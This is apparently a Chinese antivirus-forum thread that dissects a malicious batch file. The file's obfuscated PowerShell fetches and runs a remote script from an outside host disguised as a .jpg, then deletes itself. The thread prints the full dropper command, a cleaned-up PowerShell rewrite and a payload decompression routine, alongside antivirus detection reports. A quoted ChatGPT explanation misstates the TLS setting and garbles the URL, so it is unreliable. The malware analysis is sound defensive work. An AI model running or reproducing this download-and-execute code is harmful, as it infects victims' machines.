Payload

GreatMOLA

来自https://bbs.kafan.cn/thread-2265124-1-1.html中的3.bat.
VT: 3/58





附3.bat chatGPT 分析：

我将为你详细解读这段脚本的每一行。

@echo off - 这行命令主要是关闭命令的回显，避免显示不必要的信息。

CALL:SetValue - 这行命令调用下面定义的:SetValue标签下的子程序。

:SetValue - 这是一个定义为SetValue的标签，你可以将它看作是一个子程序的开始。

set ghh=Pow - 这行命令定义了一个变量ghh，其值为Pow。

set lllgg=ers - 这行命令定义了一个变量lllgg，其值为ers。

Set message=hell - 这行命令定义了一个变量message，其值为hell。

set me11=%ghh%%lllgg%%message% - 这行命令定义了一个变量me11，其值为前面三个变量的连接结果：Pow + ers + hell，所以me11就等于Powershell。

start /min %me11% $rt='x','e','I';[Array]::Reverse($rt);sal z ($rt -join '');$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$tpg='[void','] [Syst','em.Refle','ction.Asse','mbly]::LoadWi','thPartialName(''Microsoft.VisualBasic'')';z($tpg -join '');do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty55='(New-','Obje','ct Ne','t.We','bCli','ent)';$tty=z($tty55 -join '');$tty;$rot='Down','load','Str','ing';$rotJ=($rot -join '');$bnt='https','://pizzamadre.com.ar/M13C.jpg';$bntJ=($bnt -join '');$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,$rotJ,[Microsoft.VisualBasic.CallType]::Method,$bntJ);z($mv) - 这行命令在一个最小化的PowerShell窗口中执行一串PowerShell命令。

这串PowerShell命令的主要内容包括：

定义了一个变量$rt，其值为一个数组'x','e','I'，然后反转这个数组，得到'I','e','x'，并为其设置了别名z。

设置了系统的安全协议类型为3072，对应于SSL 3.0和TLS 1.0，以保证能和使用高版本SSL/TLS协议的服务正常通信。

加载了Microsoft.VisualBasic程序集，这提供了一些常见的Visual Basic语言特性。

循环pinggoogle.com直到成功，这可能是检查网络连通性的一种方式。

创建了一个新的Net.WebClient对象，并设置了别名$tty。

定义了一个字符串数组，然后将它连接成一个字符串，其值为htstp://pizzamadre.com.ar/M13C.jpg。
使用Microsoft.VisualBasic.Interaction的CallByname方法，通过$tty（即Net.WebClient对象）调用DownloadString方法，下载并返回$bntJ对应的网站内容，并执行返回的内容。

(goto) 2>nul & del "%~f0" - 这行命令的功能是重定向所有的错误输出到nul，即不显示任何错误信息，然后删除自身，%~f0在这里代表的是这个批处理脚本自身的完整路径。del "%~f0"就是删除这个脚本文件。

EXIT /B 0 - 这行命令表示结束这个批处理脚本的执行，并返回一个退出码0。

总的来说，这个批处理脚本的主要目的是使用PowerShell下载并执行一个隐藏的脚本，而这个隐藏的脚本存储在httsp://pizzamadre.com.ar/M13C.jpg。这种脚本通常是恶意的，因为它试图隐藏其行为，并下载并执行未知的脚本。这种脚本可能用于各种恶意行为,如安装恶意软件、窃取用户信息等。

GreatMOLA

对于3.bat，转换为ps脚本，增加可读性并删除ping通google.com的前提条件。（未经验证）

1. $rt='x','e','I'
   
2. [Array]::Reverse($rt)
   
3. sal z ($rt -join '')
   
4. 
   
5. $t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);
   
6. [System.Net.ServicePointManager]::SecurityProtocol = $t56fg;
   
7. 
   
8. $tpg='[void','] [Syst','em.Refle','ction.Asse','mbly]::LoadWi','thPartialName(''Microsoft.VisualBasic'')'
   
9. z($tpg -join '')
   
10. 
    
11. $tty55='(New-','Obje','ct Ne','t.We','bCli','ent)'
    
12. $tty=z($tty55 -join '')
    
13. $tty
    
14. 
    
15. $rot='Down','load','Str','ing'
    
16. $rotJ=($rot -join '')
    
17. 
    
18. $bnt='https','://pizzamadre.com.ar/M13C.jpg'
    
19. $bntJ=($bnt -join '')
    
20. 
    
21. $mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,$rotJ,[Microsoft.VisualBasic.CallType]::Method,$bntJ)
    
22. z($mv)

复制代码

t0kenzero

1. function rt45fg00 {        
   
2.     [CmdletBinding()]   
   
3.     Param ([byte[]] $byteArray)         
   
4.     Process
   
5.     {            
   
6.         $rt='x','e','I';[Array]::Reverse($rt);sal z ($rt -join '');
   
7.         $gkdf=('([IO.Compression.CompressionMode]::Decompress)')|z
   
8.         $vwlOVUmY = ('New-Object System.IO.MemoryStream( , $byteArray )')|z        
   
9.         $pXWabbBT = ('New-Object System.IO.MemoryStream')|z   
   
10.         $lfKDElJ = New-Object System.IO.Compression.GzipStream $vwlOVUmY, $gkdf   
    
11.         $ULxHecLpL = ('New-Object byte[](1024)')|z   
    
12.         while($true){        
    
13.             $iLQC = $lfKDElJ.Read($ULxHecLpL, 0, 1024)        
    
14.         if ($iLQC -le 0){break}        
    
15.         $pXWabbBT.Write($ULxHecLpL, 0, $iLQC)}                                    
    
16.         [byte[]] $bout = $pXWabbBT.ToArray()      
    
17.         Write-Output $bout   
    
18.     }
    
19. }

复制代码

混淆里面又套了个混淆剩下的两大坨拆起来好麻烦（偷懒

UNknownOoo

火绒

1. 病毒详情：
   
2. 风险路径：C:\Users\UnknownOoo\Downloads\Compressed\M13C.jpg, 病毒名：Trojan/BAT.Agent.an, 病毒ID：32c6300b0526d904, 处理结果：暂不处理

复制代码

X-Sec
扫描：MISS

hhhq316

安天 miss

DisaPDB

那个ps脚本的内容我在https://bbs.kafan.cn/forum.php?mod=redirect&goto=findpost&ptid=2265124&pid=54046010贴了
LoadWithPartialName方法被弃用了貌似

petr0vic

GreatMOLA 发表于 2024-1-18 14:12
对于3.bat，转换为ps脚本，增加可读性并删除ping通google.com的前提条件。（未经验证）

agenttesla

DisaPDB

这个payload实际上是也是ps脚本，而且把shellcode嵌进去了
看样子注入的是RegAsm.exe
不过作者估计写错了什么东西，没跑起来

biue

GDHJDSYDH

EIS扫描miss，沙箱内双击运行KFA击杀